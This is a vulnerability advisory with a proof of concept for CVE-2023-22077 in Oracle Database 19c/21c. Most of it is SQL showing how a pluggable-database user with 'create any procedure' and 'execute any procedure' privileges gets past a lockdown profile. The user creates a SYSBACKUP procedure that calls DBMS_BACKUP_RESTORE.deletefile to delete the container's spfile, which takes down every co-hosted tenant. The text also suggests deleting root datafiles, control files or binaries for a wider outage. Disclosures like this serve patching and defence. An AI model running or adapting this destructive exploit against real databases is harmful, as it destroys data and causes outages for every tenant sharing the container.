📄 Oracle 19c / 21c Denial of Service

Title: CVE-2023-22077 – Denial of Service from PDB Level against Container Level (DoS) – breaking PDB Isolation
    Product:                   Database
    Vendor:                    Oracle
    Affected Version(s):       19c,21c
    Tested Version(s):         19c,21c
    Fixed Versions:            19.21,21.12
    Risk Level:                Medium
    Solution Status:           Fixed
    CVE Reference:             CVE-2023-22077
    Base Score:                4.9
    Author of Advisory:        Emad Al-Mousa
    
    
    *****************************************
    Vulnerability Details:
    
    Isolation in Multitenant Cloud Architecture is a challenging topic in cybersecurity, for the last couple of years security researchers were able to break this isolation in multiple cloud vendors that lead to severe impact.so, its on going hot and challenging cybersecurity area.
    
    The following vulnerability PoC illustrates that even though "Lockdown Profile" security feature was in-place to restrict OS accessibility, an attacker will be able to cause a denial of service attack that can impact ALL customers co-hosted within the same container database instance.
    
    *****************************************
    Proof of Concept (PoC):
    
    From CDB$ROOT Level I will create a lockdown profile to restrict any OS_ACCESS activity:
    
    SQL> create lockdown profile OS_ACC;
    
    SQL> select * from DBA_LOCKDOWN_PROFILES;
    
    SQL> ALTER LOCKDOWN PROFILE OS_ACC DISABLE FEATURE= ('OS_ACCESS');
    
    
    
    I will enable the lockdown profile to pluggable database ORCLPDB1, as SYS user:
    
    
    SQL> alter session set container=ORCLPDB1;
    
    SQL> show parameter pdb_lockdown
    
    SQL> alter system set pdb_lockdown=OS_ACC;
    
    SQL> startup force;
    
    // side remark: to disable lockdown profile on PDB level
    
    SQL> alter system set pdb_lockdown='';
    
    At pluggable database ORCLPDB1 I will create account called John with connect,create any procedure, execute any procedure, and create any directory to try performing DOS attack weaponizing UTL_FILE package:
    
    sqlplus / as sysdba
    
    SQL> alter session set container=ORCLPDB1;
    
    SQL> create user john identified by john_123;
    
    User created.
    
    SQL> grant connect,create any procedure,create any directory,execute any procedure to john;
    
    Grant succeeded.
    
    I will now connect to ORCLPDB1 using account john:
    
    
    sqlplus "john/john_123"@ORCLPDB1
    
    SQL> show user
    USER is "JOHN"
    
    SQL> select SYS_CONTEXT ('USERENV','ORACLE_HOME') from dual;
    
    SYS_CONTEXT('USERENV','ORACLE_HOME')
    --------------------------------------------------------------------------------
    /opt/oracle/product/19c/dbhome_1
    
    SQL> create or replace directory RAMBO as  '/opt/oracle/product/19c/dbhome_1/dbs/';
    
    SQL> grant read,write on directory RAMBO to WMSYS;
    grant read,write on directory RAMBO to WMSYS
                                  *
    ERROR at line 1:
    ORA-01031: insufficient privileges
    
    ** At this stage I can't continue further as expected as lockdown profile restricted me from proceeding from doing any further exploitation weaponizing utl_file package
    
    
    Trying different approach/method with different account with different set of permissions, so I will create account "tom" in pluggable database ORCLPDB1:
    
    sqlplus / as sysdba
    
    SQL> alter session set container=ORCLPDB1;
    
    SQL> create user tom identified by tom_123;
    
    User created.
    
    SQL> grant connect,create any procedure,execute any procedure to tom;
    
    Grant succeeded.
    
    // connecting as tom against pluggable database ORCLPDB1
    
    sqlplus "tom/tom_123"@ORCLPDB1
    
    SQL> create or replace procedure sysbackup.dos is
    begin
    SYS.DBMS_BACKUP_RESTORE.deletefile('/opt/oracle/product/19c/dbhome_1/dbs/spfileORCLCDB.ora');
    end;
    /  
    
    Procedure created.
    
    SQL> exec sysbackup.dos;
    
    // Database will not startup as parameter file was deleted !!
    
    Of course more excessive damage can happen for example by deleting system data file belonging to  the CDB$ROOT OR deleting database binaries, OR CONTROL FILES which means complete and extended outage for all applications co-hosted within the container !
    
    
    
    *****************************************
    References:
    https://databasesecurityninja.wordpress.com/2025/08/04/cve-2023-22077-denial-of-service-from-pdb-level-against-container-level-dos-breaking-pdb-isolation/
    https://github.com/emad-almousa/CVE-2023-22077
    https://www.oracle.com/security-alerts/cpuoct2023.html
    https://nvd.nist.gov/vuln/detail/cve-2023-22077